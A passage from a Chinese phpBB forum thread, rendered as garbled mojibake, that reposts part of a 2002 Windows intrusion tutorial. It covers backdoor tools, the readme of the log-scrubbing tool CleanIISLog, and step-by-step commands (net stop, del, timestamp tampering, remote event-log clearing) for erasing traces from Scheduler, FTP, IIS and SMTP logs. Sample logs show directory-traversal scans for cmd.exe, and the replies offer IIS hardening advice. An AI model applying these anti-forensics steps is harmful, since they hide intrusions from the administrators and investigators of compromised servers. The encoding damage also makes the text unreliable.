¨ä¹ê¡A¬y¥ú¦Û±aªº¤£¤ÖªF¦è³£¬O¥Î©ó»s§@«áªùªº¡A¦p srv.exeµ¥¡A¥t¥~¡Axfocus¤]¦³¤£¤Ö«áªùµ{¦¡¤U¸ü¡A¦Û¤v§ä§a¡CÃö©ó«áªù´N»¡³o»ò¦h¤F¡C


---------------¤é»x--------------
®Ú¾Ú§Úªº¸gÅç¡A¤j¦h¼ÆwinªººÞ²z­û¡A¬O¤£¬Ý¤é»xªº¡C§O°Ý§Ú¡A§Ú¤]¤£ª¾¹D¬°¤°»ò¡C©Ò¥H¡A¨þ¨þ¡A§A¥i¥H©ñ¤ß¤F¡A¥u­n¤£°µ¤jªº¯}Ãa¡C¤H®a¬O¤£·|°l¬d§Aªº¡C¦pªG§AÁÙ¬O¤£©ñ¤ß¥i¥H¥Î³o­ÓªFªF¡A¨þ¨þ¡K¡K¯u¬O·PÁ¤pº_¡A¬°§Ú­Ì´£¨Ñ¤F³o»ò¦h¦nªº¤u¨ã¡C³oùØ­n»¡ªº¬OCleanIISLog¡A¤@­Ówin2000¤UÀ¿°£¸}¦Lªº¤u¨ã¡C
¬Ý¤@¤U¥¦ªºreadme¡C
===============================================
CleanIISLog ReadMe

CleanIISLog¬O¤@­Ó²M°£IIS LOG°O¿ýªº¤u¨ã¡A©M¨ä¥L¤u¨ã¬Û¤ñ¦³¥H¤U¤£¦PÂI¡G

1¡B¥i¥H²M°£«ü©wªºªºIP³s±µ°O¿ý¡A«O¯d¨ä¥LIP°O¿ý¡C

2¡B·í²M°£¦¨¥\«á¡ACleanIISLog·|¦b¨t²Î¤é»x¤¤±N¥»¨­ªº¹B¦æ°O¿ý²M°£¡C

¥Îªk: CleanIISLog <LogFile>|<.> <CleanIP>|<.>

<LogFile>: «ü©w­n³B²zªº¤é»xÀÉ¡A¦pªG«ü©w¬°¡§.¡¨¡A«h³B²z©Ò¦³ªº¤é»xÀÉ

¡]ª`·N¡G³B²z©Ò¦³¤é»xÀɻݭn«Üªøªº®É¶¡¡^¡C <CleanIP>: «ü©w­n²M°£ªºIP°O¿ý¡A¦pªG«ü©w¬°¡§.¡¨¡A«h²M°£©Ò¦³ªºIP°O¿ý¡]¤£

±ÀÂ˳o¼Ë°µ¡^¡C

CleanIISLog¥u¯à¦b¥»¦a¹B¦æ¡A¦Ó¥B¥²¶·¨ã¦³Administrators³\¥iÅv¡C
=============================================================

¥t¥~¡A­nµo¨â¥y¨cÄÌ¡A¤u¨ã¦n¡A´N¬O¦n¡A¤è«K´N¬O¤è«K¡A¦³¨Ç¤H¤j½Í¤°»ò§Þ³N§t¶q¤£°ª¤°»òªº¡A¥i¦Û¤v¬°¤°»ò¤£¤â¤u±½´y¡H´N¶H¹ï«Ý§@·~¨t²Î¡A¤@Ãä¤j½|·L³n¡A¥i¬O¦Û¤vªº¾÷¾¹¸ËªºÁÙ¬Owin¡C¤£ª¾¹D¬°¤°»ò¡H

³oùئ³¤@½gÃö©ó¤é»xªº¤å³¹¡A¦¬¦b«á­±ªºªþ¿ýùؤF¡A¬Ý¬Ý¤]³\¦³À°§U¡C

²Ä¤­³¡¤À
==============«á°O==============
©ì¤F¤Q´X¤Ñ²×©ó¼g§¹¤F¡A¥i¯à¦³¨Ç°¨ªêªº¦a¤è¡A§Æ±æ¤j®a¨£¶q¤F¡C¤]³\¡A¥H«á¤õ¤B¥i¯à·|¼g¤@¨ÇunixªºÂ²³æ¤J«I±Ðµ{¡A§Æ±æ¤j®aÃöª`¡C³Ì«á¯¬¤j®a·s¦~§Ö¼Ö¡C¡]¬Ý¡IÁ٬ݤ°»ò¡H¥þ¤å§¹¤F¡C¡^ 88¡I
2002.2.14
²Ä¤»³¡¤À
==============ªþ¿ý================

²M°£§Aªº¸}¦L----NT/2000¤U§R¤é»xªº¤èªk

¼g½g²³æ©öÀ´ªº¤å³¹µ¹¤j®a¬Ý,¨ä¹ê¦³«Ü¦h¤u¨ã³£¦³³o­Ó¥\¯à,¦ý¨º¨Ç³nÅé¥u¯à§R¨ÇÀq»{ªº,¦Ó¥B¥i¯à·|§R¤£¤F,¯u¥¿ªºÁÙ¬O­n¾a¦Û¤v¤â¤u§R¤F.¤å³¹¥i¯à¦³¿ù»~,½Ð«ü±Ð,¦¹¤å¤]°Ñ¦Ò¤Fgouy2kªº¤@½g¤å³¹,¦P®É°t¦X¹ê¨ÒÁ¿¸Ñ.

Windows2000ªº¤é»xÀɳq±`¦³À³¥Îµ{¦¡¤é»x¡A¦w¥þ¤é»x¡B¨t²Î¤é»x¡Bsmtp¦øªA¾¹¤é»x,DNS¦øªA¾¹¤é»x¡BFTP¤é»x¡BWWW¤é»xµ¥µ¥¡A¥i¯à·|®Ú¾Ú¦øªA¾¹©Ò¶}±ÒªºªA°È¤£¦P¦Ó¦³©Ò¤£¦P¡CÁÙ¦³¤@¨Çºô¸ôºÞ²z³nÅ骺¤é»x¡A»¡¨ì³oùØ¡A°O±o·s®öªººôºÞ³nÅé¬O¦Û¤v¶}µoªº¡A¦pªG¤£ÁA¸Ñ³o­Ó¡A¥i¯à·|¯d¤U§ó¦hªº°O¿ý¡C
³o¦¸¥u½Í²M°£FTP¡CIISÀ³¥Îµ{¦¡¤é»x¡Asmtp¦øªA¾¹¤é»x,¨t²Î¤é»x³o¨Ç¤@¯ë¤é»xªº©R¥O¦æ¤Uªº§R°£¤èªk.
(1) Scheduler¤é»x

SchedulerªA°È¤é»xÀq»{¦ì¸m¡G2000¤U: %sys temroot%\schedlgu.txt NTworkstation¤U¬° SchedLog.txt
¥i¥H¥´¶}schedlgu.txt
SchedlulerªA°È¤é»x¦bµù¥Uªí¤¤
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent
¥ý°±±¼¥L net stop "task scheduler" (ª`·N¤£°±¬O§R¤£±¼ªº)
µM«á¦A del schedlgu.txt ©Î schedlog.txt¤§«á´NOK¤F.
del sched*.txt
¤£¹L§A¦pªG¤£·Q§R¥L,¤]¥i¥H§ï§ï¥¦. ¥Lªº¤º®e¬O³o¼Ëªº:
" "¥ô°È­pµeµ{¦¡ªA°È"
¤w°h¥X©ó 01-5-22 20:37:34
"¥ô°È­pµeµ{¦¡ªA°È"
¤w±Ò°Ê©ó 01-5-25 7:07:37
"¥ô°È­pµeµ{¦¡ªA°È"
¤w±Ò°Ê©ó 01-5-25 7:26:36
"¥ô°È­pµeµ{¦¡ªA°È"
¤w°h¥X©ó 01-5-25 8:47:54 "
«Ü¦n§ïªº.

(2) FTP¤é»x

Internet¸ê°TªA°ÈFTP¤é»xÀq»{¦ì¸m¡G%sys temroot%\sys tem32\logfiles\msftpsvc1\¡AÀq»{¨C¤Ñ¤@­Ó¤é»x.
®æ¦¡¬O³o¼Ëªº ex*.log .
ª`·N³o¬O¤@¥xNT4ªºLOGFILES¤UªºÀÉ:
³o¥x¦øªA¾¹¤UºÞ²z¦³¦h­ÓHTTP©ÎFTP¯¸ÂI

c:\winnt\sys tem32\logfiles ªº¥Ø¿ý

00-12-04 06:28p .
00-12-04 06:28p ..
01-05-18 12:56p MSFTPSVC1
01-04-23 11:28a MSFTPSVC2
01-01-12 11:56a MSFTPSVC3
01-06-01 08:12a SMTPSVC1
01-09-20 08:55a W3SVC1
01-08-02 10:36a W3SVC10
01-10-11 04:48p W3SVC11
01-07-11 09:16a W3SVC2
01-10-11 10:31a W3SVC3
01-10-10 04:55p W3SVC4
01-09-28 01:43p W3SVC5
01-10-11 08:44a W3SVC6
01-10-11 08:00a W3SVC7
01-09-30 01:49p W3SVC8
01-10-11 08:03a W3SVC9

¬Ý¬Ý¤é»xÀɪº®æ¦¡:
c:\winnt\sys tem32\logfiles\msftpsvc1\in010306.log
192.168.5.8, anonymous, 01-3-6, 16:41:51, MSFTPSVC1, APPSERVER, 192.168.5.8, 0,
0, 0, 331, 0, [3]USER, anonymous, -,
192.168.5.8, -, 01-3-6, 16:41:51, MSFTPSVC1, APPSERVER, 192.168.5.8, 0, 0, 0, 53
0, 1326, [3]PASS, IE30User@, -,
Ãö©óLOGÀɪº§t·N§Ú´N¤£¸ÑÄÀ¤F,®ö¶O®É¶¡,¼K¼K.

ªk¤@:> ³o­Ó®É«J net stop msftpsvc °±±¼«á»OªA°È.
µM«á¾¨ºÞ del ............
¬Ý³o§R§a,¤£­n§Rªº¹L¤õ,§â·í¤Ñªº§R¤F´N¦æ. §O§Ñ¤F¦ANET START MSFTPSVC §âªA°È¥´¶}.
ªk¤G:> ·íµM§A¦pªGÁÙ·Q§ó¦n,¨º´N§ï§ï¤é§Ó,¥i¥H§ï¤F¨t²Î®É¶¡«á¦A§ï¤é§Ó,¥u§â§Aªº²M¤F,§O§Ñ¤F§â®É¶¡§ï¦^¨Ó®@
¹ê»Ú¤W¦b±o¨ìADMIN³\¥iÅv«á,°µ³o¨Ç¨Æ«Ü®e©ö.

ªk¤TSmile ³Ì¶Ì¥Êªº²MFTP¤é»xªº¤èªk, cleaniislog ¤p»T¼gªº¤u¨ã,¤£¥Î§Ú¦A±Ð¤F§a!

(3) WWW¤é»x

Internet¸ê°TªA°ÈWWW¤é»xÀq»{¦ì¸m¡G%sys temroot%\sys tem32\logfiles\w3svc1\¡AÀq»{¨C¤Ñ¤@­Ó¤é»x

ª`·N³o¬O¤@¥xNT4ªºLOGFILES¤UªºÀÉ:
³o¥x¦øªA¾¹¤UºÞ²z¦³¦h­ÓHTTP©ÎFTP¯¸ÂI

c:\winnt\sys tem32\logfiles ªº¥Ø¿ý

00-12-04 06:28p .
00-12-04 06:28p ..
01-05-18 12:56p MSFTPSVC1
01-04-23 11:28a MSFTPSVC2
01-01-12 11:56a MSFTPSVC3
01-06-01 08:12a SMTPSVC1
01-09-20 08:55a W3SVC1
01-08-02 10:36a W3SVC10
01-10-11 04:48p W3SVC11
01-07-11 09:16a W3SVC2
01-10-11 10:31a W3SVC3
01-10-10 04:55p W3SVC4
01-09-28 01:43p W3SVC5
01-10-11 08:44a W3SVC6
01-10-11 08:00a W3SVC7
01-09-30 01:49p W3SVC8
01-10-11 08:03a W3SVC9

w3svc1 ¤Uªº¤å¥ó:
01-09-18 08:00a 70,918 ex010917.log
01-09-19 08:00a 3,243,955 ex010918.log
01-09-19 10:25p 2,686,976 ex010919.log
01-09-20 10:00a 327,680 ex010920.log

¦¹®É¬Ý¬ÝÀɤº®e: type c:\winnt\sys tem32\logfiles\w3svc1\ex010920.log

01:26:17 127.74.36.149 GET /c/winnt/sys tem32/cmd.exe 404
01:26:17 127.37.88.60 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/sys tem32/cmd.e
xe 404
01:26:17 127.208.246.13 GET /d/winnt/sys tem32/cmd.exe 404
01:26:17 127.74.36.149 GET /d/winnt/sys tem32/cmd.exe 404
01:26:17 127.37.88.60 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/sys tem32/cmd.e
xe 404
01:26:17 127.208.246.13 GET /scripts/..%5c../winnt/sys tem32/cmd.exe 403
01:26:17 127.74.36.149 GET /scripts/..%5c../winnt/sys tem32/cmd.exe 403
01:26:17 127.208.246.13 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/sys tem32/cmd
.exe 404
01:26:17 127.74.36.149 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/sys tem32/cmd.
exe 404
01:26:17 127.208.246.13 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/sys tem32/cmd
.exe 404
01:26:17 127.74.36.149 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/sys tem32/cmd.
......................

shit ,¥þ¬OCGIº|¬}ªº±½´y

ªk¤@:> ³o­Ó®É«J net stop w3svc °±±¼«á»OªA°È.
µM«á¾¨ºÞ del ............
¬Ý³o§R§a,¤£­n§Rªº¹L¤õ,§â·í¤Ñªº§R¤F´N¦æ. §O§Ñ¤F¦ANET START w3svc §âªA°È¥´¶}.
ªk¤G:> ·íµM§A¦pªGÁÙ·Q§ó¦n,¨º´N§ï§ï¤é§Ó,¥i¥H§ï¤F¨t²Î®É¶¡«á¦A§ï¤é§Ó,¥u§â§Aªº²M¤F,§O§Ñ¤F§â®É¶¡§ï
¦^¨Ó®@
¹ê»Ú¤W¦b±o¨ìADMIN³\¥iÅv«á,°µ³o¨Ç¨Æ«Ü®e©ö.

ªk¤TSmile ³Ì¶Ì¥Êªº²MFTP¤é»xªº¤èªk, cleaniislog ¤p»T¼gªº¤u¨ã.
(4) SMTP¤é»x

smtpªA°È¤é»xÀq»{¦ì¸m¡G%sys temroot%\sys tem32\logfiles\smtpsvc1\
¥Ø¿ý:

01-06-01 08:12a SMTPSVC1

¸Ó¥Ø¿ý¤UªºÀɦ榡:

01-05-15 12:21a 371 ex010513.log
01-05-16 03:52a 257 ex010514.log
01-05-16 09:09a 182 ex010515.log
01-05-17 04:14p 893 ex010516.log
01-05-18 09:22a 263 ex010517.log
01-05-21 09:09a 293 ex010518.log
01-06-01 08:12a 8,222 ex010531.log
01-06-05 01:37p 3,099 ex010601.log

¸Ó¤å¥óex010601.logªº¤º®e:

00:58:24 202.104.112.168 QUIT - 0
00:58:30 202.104.112.168 MAIL FROM - 250
00:58:30 202.104.112.168 RCPT TO - 250
00:58:30 202.104.112.168 MAIL FROM - 250
00:58:30 202.104.112.168 RCPT TO - 250
00:58:30 202.104.112.168 QUIT - 0
00:59:51 202.104.112.168 MAIL FROM - 250
00:59:51 202.104.112.168 RCPT TO - 250
00:59:54 202.104.112.168 QUIT - 0
Ãö©óLOGÀɪº§t·N§Ú´N¤£¸ÑÄÀ¤F,®ö¶O®É¶¡,¼K¼K.
§R°£¤èªk:

ªk¤@:> ¦¹®É¥i¥H net stop smtpsvc
¦A del .............
§O§Ñ¤F net start smtpsvc

·íµM§ïÀɤº®e¤]¬O¥i¥Hªº¹Æ!

(5) eventlog¤é»xÀÉ
¥¦¥]§t: ¦w¥þ¤é»x
²Î¤é»x
À³¥Îµ{¦¡¤é»x
ÃD¥~¸Ü: ¬Ý¬ÝÀ³¥Îµ{¦¡¤é»x,ı±o°O¿ý±o«Ü¸Ô²Ó.
¶H³o¼Ë: ¥~´ß·N¥~°±¤î¨Ã¥BExplorer.exe³Q­«·s±Ò°Ê¡C
Detection of product ¡¥{00000804-78E1-11D2-B60F-006097C998E7}¡¥, feature ¡¥TCWord2Files¡¥ failed during request for component ¡¥¡¥
¥¦¬OÃöÁäªA°È¡C¦pªG¤£¥Î²Ä¤T¤è¤u¨ã¡A¦b©R¥O¦æ¤W´X¥G¨S¦³§R°£¦w¥þ¤é»x©M¨t²Î¤éªº¥i¯à,(¦Ü¤Ö§ÚÁÙ¨S·Q
¥X¨Ó)©Ò¥HÁÙ¬O±o¥ÎÁöµM²³æ¦ý¬O³t«×ºC±o¦º¾÷ªº¿ìªk¡G¥´¶}¡§±±¨î­±ªO¡¨ªº¡§ºÞ²z¤u¨ã¡¨¤¤ªº ¡§¨Æ¥ó¬d¬Ý¾¹¡¨
(98¨S¦³¡Aª¾¹D¥ÎWin2kªº¦n³B¤F§a)¡A¦b¥\¯àªíªº¡§¾Þ§@¡¨¶µ¦³¤@­Ó¦W¬°¡§³s±µ¨ì¥t¤@¥x ¹q¸£¡¨ªº¥\¯àªí¡AÂIÀ»¥¦¡G
¿é¤J»·ºÝ¹q¸£ªºIP¡Aµ¥,µM«á¿ï¾Ü»·ºÝ¹q¸£ªº¦w¥þ©Ê¤é»x¡A¥kÁä¿ï¾Ü¥¦ªºÄÝ©Ê,ÂIÀ»ÄÝ©Êùتº¡§²M°£¤é»x¡¨
«ö¶s¡Aµ¥°Úµ¥°Úµ¥.......OK¡I¦w¥þ¤é»x²M°£§¹²¦¡I¦P¼Ëªº§Ô¨üµh­W¥h²M°£¨t²Î¤é»x¡I

_________________
#############################
§Ö¼Ö¶ý«}¨t¦C©¯ºÖ¦v°t,³Ü¤Q¥þÂû´ö~­ì¨Ó©¯ºÖ¨º»ò²³æ!!

¾Ç·|VFP¨Ï¥ÎªÌªÀ°Ïªº·j´M,Code¤~·|§ó¦³½ì~
#############################
¦^³»ºÝ
À˵ø·|­û­Ó¤H¸ê®Æ µo°e¨p¤H°T®§
elleryq



µù¥U®É¶¡: 2007-06-21
¤å³¹: 768


²Ä 2 ¼Ó

µoªíµoªí©ó: ¬P´Á¤@ ¤G¤ë 09, 2004 10:24 am    ¤å³¹¥DÃD: ¤Þ¨¥¦^ÂÐ

IIS ¯uªº¬O«Ü­«­nªº¤@­Ó¤J«IºÞ¹D~~
·V¤§·V¤§~
¦pªG¨S¤°»ò¯S§O¥Î³~ªº¸Ü(¦p asp.net, asp... )
¥i¥H¦Ò¼{¥Î Apache~
¦^³»ºÝ
À˵ø·|­û­Ó¤H¸ê®Æ µo°e¨p¤H°T®§ °ÑÆ[µoªí¤Hªº­Ó¤Hºô¯¸
Ruey



µù¥U®É¶¡: 2003-03-12
¤å³¹: 1698
¨Ó¦Û: tunglo

²Ä 3 ¼Ó

µoªíµoªí©ó: ¬P´Á¤@ ¤G¤ë 09, 2004 1:07 pm    ¤å³¹¥DÃD: ¤Þ¨¥¦^ÂÐ

elleryq§AÁ¿ªº¨S¿ù
¦P¼Ë¬O¦bwindows2000¨Ï¥Î
IIS¤ñ¸û®e©ö¤J«I.

_________________
#############################
§Ö¼Ö¶ý«}¨t¦C©¯ºÖ¦v°t,³Ü¤Q¥þÂû´ö~­ì¨Ó©¯ºÖ¨º»ò²³æ!!

¾Ç·|VFP¨Ï¥ÎªÌªÀ°Ïªº·j´M,Code¤~·|§ó¦³½ì~
#############################
¦^³»ºÝ
À˵ø·|­û­Ó¤H¸ê®Æ µo°e¨p¤H°T®§
elleryq



µù¥U®É¶¡: 2007-06-21
¤å³¹: 768


²Ä 4 ¼Ó

µoªíµoªí©ó: ¬P´Á¤G ¤G¤ë 10, 2004 9:12 am    ¤å³¹¥DÃD: ¤Þ¨¥¦^ÂÐ

¤£¹L¥Î IIS ªº¤H¤]§O®`©È
Microsoft ¤W¦³´£¨ÑIIS Lockdown ¥H¤Î¤@¨Ç¤u¨ã¥i¥HÀ°§U§AÀ˵ø IIS ªº¦w¥þ©Ê.
µM«á§â¤@¨Ç¤£·|¥Î¨ìªº¥Ø¿ý¥H¤ÎµêÀÀ¥Ø¿ý§R°£,¨Ã¥[±j¥Ø¿ýªº¦w¥þ©Ê(¤@©w­n¥ÎNTFS!).
¥t¥~¥u­n±`±`ª`·N¬O§_¦³¬ÛÃö patch §Y¥i.
¦^³»ºÝ
À˵ø·|­û­Ó¤H¸ê®Æ µo°e¨p¤H°T®§ °ÑÆ[µoªí¤Hªº­Ó¤Hºô¯¸
±q¤§«eªº¤å³¹¶}©lÅã¥Ü:   
µoªí·s¥DÃD   ¦^ÂÐ¥DÃD    VFP ·R¥ÎªÌªÀ°Ï ­º­¶ -> Windows °Q½×°Ï ©Ò¦³ªº®É¶¡§¡¬° ¥x¥_®É¶¡ (GMT + 8 ¤p®É)
²Ä1­¶(¦@1­¶)

 
«e©¹:  
±z µLªk ¦b³o­Óª©­±µoªí¤å³¹
±z µLªk ¦b³o­Óª©­±¦^ÂФ峹
±z µLªk ¦b³o­Óª©­±½s¿è¤å³¹
±z µLªk ¦b³o­Óª©­±§R°£¤å³¹
±z µLªk ¦b³o­Óª©­±¶i¦æ§ë²¼
±z µLªk ¦b³o­Óª©­±ªþ¥[ÀÉ®×
±z µLªk ¦b³o­Óª©­±¤U¸üÀÉ®×


Powered by phpBB © 2001, 2005 phpBB Group
¥¿Å餤¤å»y¨t¥Ñ phpbb-tw ºûÅ@»s§@